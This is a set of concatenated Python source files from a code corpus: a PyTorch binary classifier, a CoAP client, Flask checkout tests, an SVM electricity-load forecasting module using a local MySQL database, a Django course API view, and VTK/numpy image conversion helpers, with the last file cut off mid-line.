CustomDataset(x_valid, y_valid) \n valid_dataloader = DataLoader(valid_set,batch_size=len(valid_set), \\\n shuffle= True)\n \n # Optimizer\n criterion = torch.nn.BCELoss(reduction='sum')\n optimizer = torch.optim.Adam(self.nnet.parameters(),\\\n lr=0.001)\n \n # Training\n self.nnet.to(self.device)\n \n history_loss=[]\n history_train_auc=[]\n history_valid_auc=[]\n \n for epoch in range(epochs):\n running_loss = 0\n nnet_train_scores = []\n train_truth = []\n self.nnet.train()\n for i, data in enumerate(training_dataloader):\n # data es una tupla batch (data, label)\n x, y = data #todavia esta en numpy\n x = x.to(self.device).float() #convierte a tensores y pasa a GPU si esta disponible\n y = y.to(self.device).float() #convierte a tensores y pasa a GPU si esta disponible\n \n # set gradient to zero\n optimizer.zero_grad()\n \n # forward\n y_hat = self.nnet(x)\n \n # loss\n loss = criterion(y_hat[:,0], y)\n \n # backward\n loss.backward()\n \n # update of parameters\n optimizer.step()\n \n # compute loss and statistics\n running_loss += loss.item()\n \n train_truth += list(y.detach().numpy()) \n nnet_train_scores += list(y_hat[:,0].detach().numpy())\n \n history_loss.append(running_loss/x_train.shape[0])\n \n train_auc = roc_auc_score(train_truth, nnet_train_scores)\n history_train_auc.append(train_auc)\n \n \n if (verbose) & ((epoch) % (epochs/10)==0):\n self.nnet.eval()\n with torch.no_grad():\n \n if (x_valid is not None) & (y_valid is not None):\n \n nnet_valid_scores = []\n valid_truth = []\n \n for i, data in enumerate(valid_dataloader):\n # batch\n x, y = data\n x = x.to(self.device).float()\n y = y.to(self.device).float()\n \n # forward \n y_hat = self.nnet(x)\n \n # accumulate data\n valid_truth += list(y.detach().numpy()) \n nnet_valid_scores += list(y_hat[:,0].detach().numpy())\n \n valid_auc = roc_auc_score(valid_truth, nnet_valid_scores)\n history_valid_auc.append(valid_auc)\n \n print(f\"Epoch = {epoch} | \" + \\\n f\"loss = {running_loss / x_train.shape[0]} | \" + \\\n f\"train auc: {train_auc}\" + \\\n f\"valid auc: {valid_auc}\")\n else:\n print(f\"Epoch = {epoch} | \" + \\\n f\"loss = {running_loss / x_train.shape[0]} | \" +\\\n f\"train auc: {train_auc}\")\n \n return history_loss,history_train_auc, history_valid_auc\n \n def predict(self,x):\n self.nnet.eval()\n with torch.no_grad():\n test_set = TestCustomDataset(x)\n test_dataloader = DataLoader(test_set,batch_size=len(test_set), \\\n shuffle= False)\n \n for i, data in enumerate(test_dataloader):\n x = data \n x = x.to(self.device).float() \n y_hat = self.nnet(x)\n y_hat = y_hat[:,0].detach().numpy()\n y_hat = y_hat >= 0.5\n\n return y_hat\n \n def predict_proba(self,x):\n self.nnet.eval()\n with torch.no_grad():\n test_set = TestCustomDataset(x)\n test_dataloader = DataLoader(test_set,batch_size=len(test_set), \\\n shuffle= False)\n \n for i, data in enumerate(test_dataloader):\n x = data \n x = x.to(self.device).float() \n y_hat = self.nnet(x)\n y_hat = y_hat[:,0].detach().numpy()\n\n return y_hat\n \n\n\ndef test_NnetBinaryClass(): \n \n X1 = np.random.uniform(0,8,10000)\n U = np.random.uniform(0,1,10000)\n N1 = np.random.normal(3,0.1,10000)\n N2 = np.random.normal(-1,0.1,10000)\n X2 = (X1-4)**2\n X2[U>=0.5] = X2[U>=0.5] + N1[U >= 0.5]\n X2[U < 0.5] = X2[U < 0.5] + N2[U < 0.5]\n Y = np.zeros(10000)\n mask = X2 >= (X1-4)**2\n Y[mask] = 1\n Y[~mask] = 0\n \n fig, ax = plt.subplots(1,1)\n ax.scatter(X1[Y==0],X2[Y==0], color='blue')\n ax.scatter(X1[Y==1],X2[Y==1], color='red')\n plt.show\n \n X1=X1[:,np.newaxis]\n X2=X2[:,np.newaxis]\n x=np.append(X1, X2, axis = 1)\n \n x_train, x_test, Y_train, Y_test = \\\n model_selection.train_test_split( x, Y, test_size=0.2, random_state=5)\n \n x_train, x_valid, Y_train, Y_valid= \\\n model_selection.train_test_split( x_train, Y_train, \\\n test_size=0.2, random_state=5)\n \n model = NnetBinaryClass()\n \n model.fit(x_train,Y_train,x_valid,Y_valid)\n \n y_test_hat = model.predict(x_test)\n \n plt.figure()\n plt.scatter(x_test[y_test_hat==0,0],x_test[y_test_hat==0,1],color='blue')\n plt.scatter(x_test[y_test_hat==1,0],x_test[y_test_hat==1,1],color='red')\n plt.title('Dataset Test')\n plt.xlabel('x1')\n plt.ylabel('x2')\n plt.show()\n \n test_accuracy = accuracy_score(Y_test,y_test_hat)\n test_recall = recall_score(Y_test,y_test_hat)\n test_precision = precision_score(Y_test, y_test_hat)\n test_f1 = f1_score(Y_test,y_test_hat)\n print(f\"Accuracy: {test_accuracy}\")\n print(f\"Recall: {test_recall}\")\n print(f\"Precision: {test_precision}\")\n print(f\"F1-Score: {test_f1}\")\n \n conf_matrix = confusion_matrix(Y_test, y_test_hat)\n plot_confusion_matrix(conf_matrix,target_names = np.unique(Y_test), \\\n title = \"Confusion Matrix\")\n# Run test\ntest_NnetBinaryClass() ","sub_path":"Examen/Scripts/NNet_binary_clasification.py","file_name":"NNet_binary_clasification.py","file_ext":"py","file_size_in_byte":11951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"493553995","text":"from coapthon.client.helperclient import HelperClient\r\nfrom coapthon import defines\r\nfrom coapthon.messages.request import Request\r\n\r\n\r\nhost = \"127.0.0.1\"\r\nport = 5683\r\npath =\"basic\"\r\npayload = 'text/plain'\r\n\r\nclient = HelperClient(server=(host, port))\r\nresponse = client.get(path)\r\nprint(response.pretty_print())\r\n\r\n# Create a registration resource\r\nct = {'content_type': defines.Content_types[\"application/link-format\"]}\r\npayload = 'Random text1234'\r\nresponse = client.post(path, payload, None, None, **ct)\r\nlocation_path = response.location_path\r\nprint(response.pretty_print())\r\n \r\nclient.stop()\r\n","sub_path":"pmsclient.py","file_name":"pmsclient.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"192290060","text":"import json\n\nimport pytest\n\nfrom app import create_app\n\n\n@pytest.fixture()\ndef testing_client():\n app = create_app(config='test')\n\n test_client = app.test_client()\n\n ctx = app.app_context()\n ctx.push()\n\n yield test_client\n\n ctx.pop()\n\n\ndef _load_data(filepath):\n with open(filepath) as f:\n data = json.load(f)\n return data\n\n\ndef test_level1(testing_client):\n data = _load_data('./level1/data.json')\n\n response = testing_client.post('/checkout', json=data)\n assert response.status_code == 200\n\n output = _load_data('./level1/output.json')\n assert output == response.get_json()\n\n\ndef test_level2(testing_client):\n data = _load_data('./level2/data.json')\n\n response = testing_client.post('/checkout', json=data)\n assert response.status_code == 200\n\n output = _load_data('./level2/output.json')\n assert output == response.get_json()\n\n\ndef test_level3(testing_client):\n data = _load_data('./level3/data.json')\n\n response = testing_client.post('/checkout', json=data)\n assert response.status_code == 200\n\n output = _load_data('./level3/output.json')\n assert output == response.get_json()\n","sub_path":"backend/test_app.py","file_name":"test_app.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"25158026","text":"\"\"\"\n第四代:仅对未来进行预测,使用未来数据,不使用预测数据,对一些异常点单独测试,模块化,SVM预测模型\n\"\"\"\nimport pymysql\nimport numpy as np\nimport datetime\nimport math\nfrom sklearn import svm\nimport warnings\n\nname = \"SVM回归分析\"\nThreshold = 45 # 49\n#sigma = math.sqrt(0.5) # 0.5\n#mu = 0.94 # 0.94\n#SIM_range = 1 # 1\n#sigmaList = [math.sqrt(0.5),math.sqrt(1)]\n#muList = [0.7,0.8,0.9,0.94]\nSIM_range = 1\n#sigmaList = [math.sqrt(0.25),math.sqrt(0.5),math.sqrt(0.75),math.sqrt(1),math.sqrt(1.25),math.sqrt(1.5),math.sqrt(1.75),math.sqrt(2)]\nsigmaList = [math.sqrt(0.25),math.sqrt(0.5),math.sqrt(0.75),math.sqrt(1)]\n#sigmaList = [math.sqrt(0.5),math.sqrt(1)]\n#muList = [0.1,0.125,0.15,0.175,0.2,0.225,0.25,0.275,0.3,0.325,0.35,0.375,0.4,0.425,0.45,0.475,0.5,0.525,0.55,0.575,0.6,0.625,0.65,0.675,0.7,0.725,0.75,0.775,0.8,0.825,0.85,0.875,0.9,0.925,0.94,0.95,0.975,0.98,0.985,0.99]\n#muList = [0.7,0.71,0.72,0.73,0.74,0.75,0.76,0.77,0.78,0.79,0.8,0.81,0.82,0.83,0.84,0.85,0.86,0.87,0.88,0.89,0.9,0.91,0.92,0.93,0.94,0.95,0.96,0.97,0.98,0.99]\n#muList = [0.7,0.725,0.75,0.775,0.8,0.825,0.85,0.875,0.9,0.91,0.925,0.94,0.95,0.96,0.975,0.98,0.99]\n#muList = [0.7,0.75,0.8,0.85,0.9,0.91,0.925,0.94,0.95,0.96,0.975,0.98,0.99]\nmuList = [0.9,0.91,0.925,0.94,0.95,0.96,0.975,0.98,0.99]\nMaxValue = 10000\n\nclass PredictList:\n def __init__(self, date=[], real=[], predict=[], MAPE=0):\n self.date = date\n self.real = real\n self.predict = predict\n self.MAPE = MAPE\n\ndef data_search(searchtype, dd, ss, hld, fs, type=1, datatype=1):\n conn = pymysql.connect(host='localhost', port=3306, user='yxl', passwd='123456', db='powerload') # db:库名\n cur = conn.cursor()\n TempList = []\n Count = cur.execute('select ' + searchtype + ' from data' + dd + ss + hld + fs)\n results = cur.fetchall()\n result = list(results)\n for r in result:\n TempList.append(('%s' % r))\n if type == 1:\n if Count > Threshold:\n Temp = TempList[Count - Threshold:]\n else:\n Temp = TempList\n else:\n Temp = TempList\n cur.scroll(0, mode='absolute')\n cur.close()\n conn.close()\n if datatype == 1:\n TempList = []\n for num in Temp:\n num = float(num)\n TempList.append(num)\n return TempList\n else:\n cur.scroll(0, mode='absolute')\n return Temp\n\ndef pre_week(date_list,predict_type,index):\n conn = pymysql.connect(host='localhost', port=3306, user='yxl', passwd='123456', db='powerload') # db:库名\n cur = conn.cursor()\n current_data_list = []\n\n for date in date_list:\n current_data = []\n Count = cur.execute('select ' + predict_type + ' from data '\n 'where date = DATE_SUB(\"' + date + '\",'\n 'INTERVAL ' + str(index) + ' DAY);')\n if Count == 0:\n Count = cur.execute('select ' + predict_type + ' from data '\n 'where date = \"' + date + '\";')\n results = cur.fetchall()\n result = list(results)\n for r in result:\n current_data.append(('%s' % r))\n for num in current_data:\n num = float(num)\n current_data_list.append(num)\n\n cur.close()\n conn.close()\n return current_data_list\n\ndef CalMAPE(Data_List_1, Data_List_2):\n SumMAPE = 0\n for pl in range(len(Data_List_1)):\n SumMAPE += abs(Data_List_1[pl] - Data_List_2[pl]) / Data_List_1[pl]\n MAPE = SumMAPE / len(Data_List_1)\n return MAPE\n\ndef CalMASE(Data_List_1, Data_List_2):\n SumMASE_1 = 0\n SumMASE_2 = 0\n for pl in range(len(Data_List_1)):\n SumMASE_1 += abs(Data_List_2[pl] - Data_List_1[pl])\n if pl:\n SumMASE_2 += abs(Data_List_1[pl - 1] - Data_List_1[pl])\n MASE_1 = SumMASE_1 / len(Data_List_1)\n MASE_2 = SumMASE_2 / (len(Data_List_1) - 1)\n MASE = MASE_1 / MASE_2\n return MASE\n\ndef Predict_Main(date_start=\"2007-1-1\", date_end=\"2007-12-31\", paramter = 5, predicttype=\"Max\"):\n warnings.filterwarnings(\"ignore\")\n\n if predicttype == \"Max\":\n predict_type = \"PowerLoadMax\"\n elif predicttype == \"Aver\":\n predict_type = \"PowerLoadAver\"\n elif predicttype == \"Min\":\n predict_type = \"PowerLoadMin\"\n else:\n pass\n\n date_predict = []\n SVM_result = []\n\n conn = pymysql.connect(host='localhost', port=3306, user='yxl', passwd='123456', db='powerload') # db:库名\n cur = conn.cursor()\n Count = cur.execute('select date from data where date >= \"'\n + date_start + '\" and date <= \"' + date_end + '\";')\n results = cur.fetchall()\n result = list(results)\n for r in result:\n date_predict.append(('%s' % r))\n date_during = \" where date >= '\" + date_start + \"' and date <= '\" + date_end + \"'\"\n\n cur.scroll(0, mode='absolute')\n cur.close()\n conn.close()\n\n AverTemper_predict = data_search(\"AverTemper\", date_during, \"\", \"\", \";\", 0, 1)\n AverPress_predict = data_search(\"AverPress\", date_during, \"\", \"\", \";\", 0, 1)\n AverSPress_predict = data_search(\"AverSPress\", date_during, \"\", \"\", \";\", 0, 1)\n LowTemper_predict = data_search(\"LowTemper\", date_during, \"\", \"\", \";\", 0, 1)\n HighTemper_predict = data_search(\"HighTemper\", date_during, \"\", \"\", \";\", 0, 1)\n LowPress_predict = data_search(\"LowPress\", date_during, \"\", \"\", \";\", 0, 1)\n HighPress_predict = data_search(\"HighPress\", date_during, \"\", \"\", \";\", 0, 1)\n PowerLoadMax_real = data_search(predict_type, date_during, \"\", \"\", \";\", 0, 1)\n\n pre_best_i = 0\n pre_best_j = 0\n\n for date_index in range(len(date_predict)):\n date_during = \" where date < '\" + date_predict[date_index] + \"'\"\n season = \" and date in (select date from date where season = (select season from date where date = '\" + \\\n date_predict[date_index] + \"'))\"\n holiday = \" and date in (select date from date where holiday = (select holiday from date where date = '\" + \\\n date_predict[date_index] + \"') and week = (select week from date where date = '\" + \\\n date_predict[date_index] + \"'))\"\n finish_signal = \";\"\n\n if paramter == 1:\n season = \"\"\n holiday = \"\"\n elif paramter == 3:\n holiday = \"\"\n elif paramter == 5:\n season = \"\"\n else:\n pass\n\n data_history = data_search(\"date\", date_during, season, holiday, finish_signal, 1, 0) \\\n + [date_predict[date_index], ]\n AverTemper = data_search(\"AverTemper\", date_during, season, holiday, finish_signal, 1, 1) \\\n + [AverTemper_predict[date_index], ]\n AverPress = data_search(\"AverPress\", date_during, season, holiday, finish_signal, 1, 1) \\\n + [AverPress_predict[date_index], ]\n AverSPress = data_search(\"AverSPress\", date_during, season, holiday, finish_signal, 1, 1) \\\n + [AverSPress_predict[date_index], ]\n LowTemper = data_search(\"LowTemper\", date_during, season, holiday, finish_signal, 1, 1) \\\n + [LowTemper_predict[date_index], ]\n HighTemper = data_search(\"HighTemper\", date_during, season, holiday, finish_signal, 1, 1) \\\n + [HighTemper_predict[date_index], ]\n LowPress = data_search(\"LowPress\", date_during, season, holiday, finish_signal, 1, 1) \\\n + [LowPress_predict[date_index], ]\n HighPress = data_search(\"HighPress\", date_during, season, holiday, finish_signal, 1, 1) \\\n + [HighPress_predict[date_index], ]\n PowerLoadMax = data_search(predict_type, date_during, season, holiday, finish_signal, 1, 1)\n\n history_1 = pre_week(data_history, predict_type, 1)\n history_2 = pre_week(data_history, predict_type, 2)\n history_3 = pre_week(data_history, predict_type, 3)\n history_4 = pre_week(data_history, predict_type, 4)\n history_5 = pre_week(data_history, predict_type, 5)\n history_6 = pre_week(data_history, predict_type, 6)\n history_7 = pre_week(data_history, predict_type, 7)\n\n current_data = []\n current_data.append(AverTemper_predict[date_index])\n current_data.append(AverPress_predict[date_index])\n current_data.append(AverSPress_predict[date_index])\n current_data.append(LowTemper_predict[date_index])\n current_data.append(HighTemper_predict[date_index])\n current_data.append(LowPress_predict[date_index])\n current_data.append(HighPress_predict[date_index])\n current_data.append(history_1[len(history_1) - 1])\n current_data.append(history_2[len(history_2) - 1])\n current_data.append(history_3[len(history_3) - 1])\n current_data.append(history_4[len(history_4) - 1])\n current_data.append(history_5[len(history_5) - 1])\n current_data.append(history_6[len(history_6) - 1])\n current_data.append(history_7[len(history_7) - 1])\n\n samplein = np.mat([AverTemper, AverPress, AverSPress, LowTemper, HighTemper, LowPress, HighPress, history_1, history_2, history_3, history_4, history_5, history_6, history_7])\n sample_predict = np.mat([current_data, ] * len(data_history)).T\n sampleinminmax = np.array([samplein.min(axis=1).T.tolist()[0], samplein.max(axis=1).T.tolist()[0]]).transpose()\n sampleinnorm = ((np.array(samplein.T) - sampleinminmax.transpose()[0]) / (\n sampleinminmax.transpose()[1] - sampleinminmax.transpose()[0])).transpose()\n sample_predictnorm = ((np.array(sample_predict.T) - sampleinminmax.transpose()[0]) / (\n sampleinminmax.transpose()[1] - sampleinminmax.transpose()[0])).transpose()\n\n sample_temp = sampleinnorm - sample_predictnorm\n\n #得到当前日期最优解参数\n predict_finalresult = MaxValue\n current_best_i,current_best_j = 0,0\n for mu_index in range(len(muList)):\n for sigma_index in range(len(sigmaList)):\n SIMMartrix = np.zeros([sample_temp.shape[0], sample_temp.shape[1]])\n SIMCount = [0, ] * sample_temp.shape[1]\n\n for row in range(sample_temp.shape[0]):\n for column in range(sample_temp.shape[1]):\n if np.exp(-(sample_temp[row][column] ** 2) / (2 * sigmaList[sigma_index] * sigmaList[sigma_index])) >= muList[mu_index]:\n SIMMartrix[row][column] = 1\n SIMCount[column] += 1\n else:\n SIMMartrix[row][column] = 0\n\n SIMCount.pop()\n SVM_X = []\n SVM_y = []\n MaxIndexCount = 0\n for i in range(len(SIMCount)):\n if SIMCount[i] >= (max(SIMCount) - SIM_range):\n MaxIndexCount += 1\n SVM_X.append(\n [AverTemper[i], AverPress[i], AverSPress[i], LowTemper[i], HighTemper[i], LowPress[i],\n HighPress[i], history_1[i], history_2[i], history_3[i], history_4[i], history_5[i],\n history_6[i], history_7[i]])\n SVM_y.append(PowerLoadMax[i])\n\n predict_result = algorithm_SVM(SVM_X,SVM_y,current_data)\n if abs(predict_result - PowerLoadMax_real[date_index]) <= abs(predict_finalresult - PowerLoadMax_real[date_index]):\n predict_finalresult = predict_result\n current_best_i = mu_index\n current_best_j = sigma_index\n\n #通过上次的最优解参数得到当前日期的预测值\n SIMMartrix = np.zeros([sample_temp.shape[0], sample_temp.shape[1]])\n SIMCount = [0, ] * sample_temp.shape[1]\n\n for row in range(sample_temp.shape[0]):\n for column in range(sample_temp.shape[1]):\n if np.exp(-(sample_temp[row][column] ** 2) / (2 * sigmaList[pre_best_j] * sigmaList[pre_best_j])) >= muList[pre_best_i]:\n SIMMartrix[row][column] = 1\n SIMCount[column] += 1\n else:\n SIMMartrix[row][column] = 0\n\n SIMCount.pop()\n SVM_X = []\n SVM_y = []\n MaxIndexCount = 0\n for i in range(len(SIMCount)):\n if SIMCount[i] >= (max(SIMCount) - SIM_range):\n MaxIndexCount += 1\n SVM_X.append(\n [AverTemper[i], AverPress[i], AverSPress[i], LowTemper[i], HighTemper[i], LowPress[i],\n HighPress[i], history_1[i], history_2[i], history_3[i], history_4[i], history_5[i],\n history_6[i], history_7[i]])\n SVM_y.append(PowerLoadMax[i])\n\n current_predict_result = algorithm_SVM(SVM_X,SVM_y,current_data)\n\n SVM_result.append(current_predict_result)\n pre_best_i = current_best_i\n pre_best_j = current_best_j\n\n # 计算MAPE\\MASE\n MAPE = CalMAPE(PowerLoadMax_real, SVM_result)\n MASE = CalMASE(PowerLoadMax_real, SVM_result)\n print(\"MAPE:\" + str(round(MAPE * 100,2)) + \"%\")\n print(\"MASE:\" + str(round(MASE * 100, 2)) + \"%\")\n return PredictList(date_predict, PowerLoadMax_real, SVM_result, MAPE)\n\ndef algorithm_SVM(X,y,test):\n clf = svm.SVR(gamma='auto', C=75, epsilon=50)\n clf.fit(X, y)\n result = round(float(clf.predict(test)), 2)\n return result\n\nif __name__ == '__main__':\n start_date = [\"2007-1-1\",\"2007-2-1\",\"2007-3-1\",\"2007-4-1\",\"2007-5-1\",\"2007-6-1\",\"2007-7-1\",\"2007-8-1\",\"2007-9-1\",\"2007-10-1\",\"2007-11-1\",\"2007-12-1\"]\n end_date = [\"2007-1-31\",\"2007-2-28\",\"2007-3-31\",\"2007-4-30\",\"2007-5-31\",\"2007-6-30\",\"2007-7-31\",\"2007-8-31\",\"2007-9-30\",\"2007-10-31\",\"2007-11-30\",\"2007-12-31\"]\n for i in range(len(start_date)):\n print(\"start:\" + start_date[i] + \"---end:\" + end_date[i])\n Result = Predict_Main(start_date[i], end_date[i])\n Result = Predict_Main()\n","sub_path":"ForcastingAlgorithm/SVM/Moudle.py","file_name":"Moudle.py","file_ext":"py","file_size_in_byte":13998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"139492148","text":"from rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom api import models\nfrom rest_framework.viewsets import GenericViewSet, ViewSetMixin, ModelViewSet\nfrom api.serializers.course import CourseSerializer, CourseDetailSerializer\nfrom api.auth.auth import TokenAuth\n\n\nclass CourseView(ModelViewSet):\n def list(self, request, *args, **kwargs):\n\n ret = {'code': 1000, 'data': None}\n\n try:\n queryset = models.Course.objects.all()\n ser = CourseSerializer(instance=queryset, many=True)\n ret[\"data\"] = ser.data\n except Exception as e:\n ret[\"code\"] = 1001\n ret[\"data\"] = \"error:\" + str(e)\n\n return Response(ret)\n\n def retrieve(self, request, *args, **kwargs):\n ret = {'code': 1000, 'data': None}\n try:\n pk = kwargs.get(\"pk\")\n print(pk)\n queryset = models.CourseDetail.objects.filter(course_id=pk).first()\n ser = CourseDetailSerializer(instance=queryset, many=False)\n ret[\"data\"] = ser.data\n except Exception as e:\n ret[\"code\"] = 1001\n ret[\"data\"] = \"error:\" + str(e)\n\n return Response(ret)\n","sub_path":"web_server/luffycity/api/views/course.py","file_name":"course.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"494839801","text":"from functools import reduce\n\nimport numpy as np\nimport pandas as pd\nimport vtk\nfrom vtk.util import numpy_support\nfrom vtk.util.numpy_support import vtk_to_numpy\nimport warnings\n\n\ndef read_vtp(input_file):\n \"\"\" Read vtk poly data file and output vtkPolyData\n :param input_file: path to vtkXMLPolyData (vtp) file\n :return: vtkPolyData\n \"\"\"\n reader = vtk.vtkXMLPolyDataReader()\n reader.SetFileName(input_file)\n reader.Update()\n return reader.GetOutput()\n\n\ndef read_vti(input_file):\n \"\"\" Read vtk poly data file and output vtkImageData\n :param input_file: path to vtkImageData (vti) file\n :return: vtkImageData\n \"\"\"\n reader = vtk.vtkXMLImageDataReader()\n reader.SetFileName(input_file)\n reader.Update()\n return reader.GetOutput()\n\n\ndef write_vti(image, output_filename):\n \"\"\" Write vtk image data to output vti file\n :params:\n image: vtkImageData to write\n output_filename: path to output vti file to write\n \"\"\"\n writer = vtk.vtkXMLImageDataWriter()\n writer.SetFileName(output_filename)\n if vtk.VTK_MAJOR_VERSION <= 5:\n writer.SetInputConnection(image.GetProducerPort())\n else:\n writer.SetInputData(image)\n writer.Write()\n\n\ndef vti_to_numpy(vti_image, channel_names=None, dtype=np.float32, xyz_transpose=True):\n \"\"\"\n Create a numpy.ndarray from a vti image\n\n :param vti_image: vtkImageData\n :param channel_names: array columns you want extract.\n If `None` all channels will be extracted (Default)\n :param dtype: type of array to return (default float32)\n :param xyz_transpose: Transpose from z,y,x ordering to x,y,z ordering\n :return: numpy.ndarray of shape:\n (nx,ny,nz,n_channels) if xyz_transpose=True or\n (nx,ny,nx,n_channels) if xyz_transpose=False\n \"\"\"\n nx, ny, nz = vti_image.GetDimensions()\n point_data = vti_image.GetPointData()\n\n if channel_names is None:\n num_channels = point_data.GetNumberOfArrays()\n channel_names = [point_data.GetArrayName(i) for i in range(num_channels)]\n\n vtk_arrays = [point_data.GetArray(channel) for channel in channel_names]\n\n image_channels_flat = [vtk_to_numpy(vtk_array) for vtk_array in vtk_arrays]\n\n image_channels = [image_flat.reshape(nz, ny, nx) for image_flat in image_channels_flat]\n\n if xyz_transpose:\n image_channels = [image_zyx.transpose() for image_zyx in image_channels]\n\n image_channels = np.stack(image_channels, axis=-1).astype(dtype) # Last dimension is channel\n\n return image_channels\n\n\ndef vti_to_numpy_multiple_channels(vti_image, channel_names, dtype=np.float32, xyz_transpose=True):\n \"\"\"\n Create a numpy.ndarray from a vti image\n\n :param vti_image: vtkImageData\n :param channel_names: array columns you want extract.\n If `None` all channels will be extracted (Default)\n :param dtype: type of array to return (default float32)\n :param xyz_transpose: Transpose from z,y,x ordering to x,y,z ordering\n :return: numpy.ndarray of shape:\n (nx,ny,nz,n_channels) if xyz_transpose=True or\n (nx,ny,nx,n_channels) if xyz_transpose=False\n \"\"\"\n warnings.warn('vti_to_numpy_multiple_channels is deprecated; use vti_to_numpy(...).',\n DeprecationWarning)\n\n return vti_to_numpy(vti_image=vti_image, channel_names=channel_names,\n dtype=dtype, xyz_transpose=xyz_transpose)\n\n\ndef numpy_to_vti(array, spacing, origin, dimensions, array_name, xyz_transpose=True):\n \"\"\"\n Convert numpy array to a vti image (vtkImageData)\n :param array: numpy.ndarray\n :param spacing: Voxel spacing\n :param origin: image origin\n :param dimensions: number of voxels in each dimension (nx,ny,nz)\n :param array_name: Name to assign the array in the vti image\n :param xyz_transpose: Transpose from x,y,z ordering to z,y,x ordering. Note VTK uses z,y,z\n :return: vtkImageData\n \"\"\"\n image = create_empty_vtk_image_data(spacing, origin, dimensions)\n vtk_array = numpy_support.numpy_to_vtk(array.transpose().flatten() if xyz_transpose else array.flatten())\n vtk_array.SetName(array_name)\n image.GetPointData().AddArray(vtk_array)\n return image\n\n\ndef numpy_to_vti_multiple_channels(array, spacing, origin, dimensions, array_names, channels_last=True,\n xyz_transpose=True, xyz_dimensions=(0, 1, 2)):\n \"\"\"\n Convert numpy array to a vti image (vtkImageData)\n\n Default usage assumes that the array is ordered [x,y,z,channel]\n\n numpy_to_vti_multiple_channels(np_image,(3,3,3), (0,0,0), (50,100,10), ['TwoSix', 'MLEM'])\n\n Another example where the channels are first\n\n numpy_to_vti_multiple_channels(np_image,(3,3,3), (0,0,0), (50,100,10), ['TwoSix', 'MLEM'],channel_dimension=0)\n\n Array is already ordered zyx:\n numpy_to_vti_multiple_channels(np_image,(3,3,3), (0,0,0), (50,100,10), ['TwoSix', 'MLEM'],\n xyz_transpose=False)\n\n :param array: numpy.ndarray\n :param spacing: Voxel spacing\n :param origin: image origin\n :param dimensions: number of voxels in each dimension (nx,ny,nz)\n :param array_names: Names to assign the arrays in the vti image\n :param channels_last: True If the channels are last. else assumes channels are first. Default is last (True)\n :param xyz_transpose: Transpose from x,y,z ordering to z,y,x ordering. Note VTK uses z,y,z\n :param xyz_dimensions: Dimensions of the x, y, & z values. Default is (0,1,2).\n :return: vtkImageData\n \"\"\"\n image = create_empty_vtk_image_data(spacing, origin, dimensions)\n\n array_dimensions = range(len(array.shape))\n xdim, ydim, zdim = xyz_dimensions\n\n if channels_last:\n last_dim = len(array.shape) - 1\n\n # Sort the dimensions so the channel is first\n channel_first_dims = sorted(array_dimensions, key=lambda dim: dim if dim != last_dim else np.NINF)\n\n # Transpose so channel is first. Easier for looping over channels\n array = array.transpose(channel_first_dims)\n\n # Add one to the x,y,z dimension because the were shifted down in the channel transpose\n xdim, ydim, zdim = [dim + 1 for dim in xyz_dimensions]\n\n if xyz_transpose:\n array = array.transpose(0, zdim, ydim, xdim) # [channel,z,y,x]\n\n for name, channel_array in zip(array_names, array):\n vtk_array = numpy_support.numpy_to_vtk(channel_array)\n vtk_array.SetName(name)\n image.GetPointData().AddArray(vtk_array)\n\n return image\n\n\ndef create_empty_vtk_image_data(spacing, origin, dimensions):\n \"\"\" Create a vti image data of doubles\n :params:\n spacing: tuple of spacing for x,y,z\n origin: tuple of x,y,z origin\n dimensions: tuple of number of voxels in nx,ny,nz\n :return:\n vtk image data\n \"\"\"\n image = vtk.vtkImageData()\n image.SetSpacing(*spacing)\n image.SetOrigin(*origin)\n image.SetDimensions(*dimensions)\n return image\n\n\ndef real_to_structured_coordinates(image, xmin, xmax, ymin, ymax, zmin, zmax, as_slice=True):\n \"\"\"\n Generate a a tuple of slices in structured image coordinates from\n real extents locations. Structured coordinates are the indices of an image\n\n extent_columns = ['xmin', 'xmax', 'ymin', 'ymax', 'zmin', 'zmax']\n\n crop_coords = real_to_structured_coordinates(img,*row[extent_columns])\n img_np = vti_to_numpy(img)\n cropped_voxels = img_np[crop_coords]\n\n ... or for labeling an image\n\n truth_image_np = np.zeros_like(image_np)\n truth_image_np[crop_coords] = 1\n\n :param image: vti image\n :param xmin: minimum x extent in real coordinate space\n :param xmax: maximum x extent in real coordinate space\n :param ymin: minimum y extent in real coordinate space\n :param ymax: maximum y extent in real coordinate space\n :param zmin: minimum z extent in real coordinate space\n :param zmax: maximum z extent in real coordinate space\n :param as_slice: return a slice object if True else return list of tuple pairs extents\n :return: (slice(imin:imin),slice(jmin:jmin),slice(kmin:kmin))\n \"\"\"\n min_voxel_ijk = [int()] * 3\n max_voxel_ijk = [int()] * 3\n pcoords = [float()] * 3\n\n image.ComputeStructuredCoordinates([xmin, ymin, zmin], min_voxel_ijk, pcoords)\n image.ComputeStructuredCoordinates([xmax, ymax, zmax], max_voxel_ijk, pcoords)\n\n # We don't want a zero index starting voxel coordinate\n min_voxel_ijk = [max((i, 1)) for i in min_voxel_ijk]\n\n # Lets create a slice region on each dimension so we can crop higher dimensional blocks :)\n coords_slices = [(imin, imax) for imin, imax in zip(min_voxel_ijk, max_voxel_ijk)]\n\n if as_slice: # give me a slice bro!\n coords_slices = [slice(*extents) for extents in coords_slices]\n\n return tuple(coords_slices)\n\n\ndef real_to_structured_coordinates2(image, xmin, xmax, ymin, ymax, zmin, zmax):\n \"\"\"\n Generate a a tuple of slices in structured image coordinates from\n real extents locations.\n\n extent_columns = ['xmin', 'xmax', 'ymin', 'ymax', 'zmin', 'zmax']\n\n crop_coords = real_to_structured_coordinates(img,*row[extent_columns])\n img_np = vti_to_numpy(img)\n cropped_voxels = img_np[crop_coords]\n\n ... or for labeling an image\n\n truth_image_np = np.zeros_like(image_np)\n truth_image_np[crop_coords] = 1\n\n :param image: vti image\n :param xmin xmax ymin ymax zmin zmax:\n :return: (slice(imin:imin),slice(jmin:jmin),slice(kmin:kmin))\n \"\"\"\n\n warnings.warn('real_to_structured_coordinates2 is deprecated; use 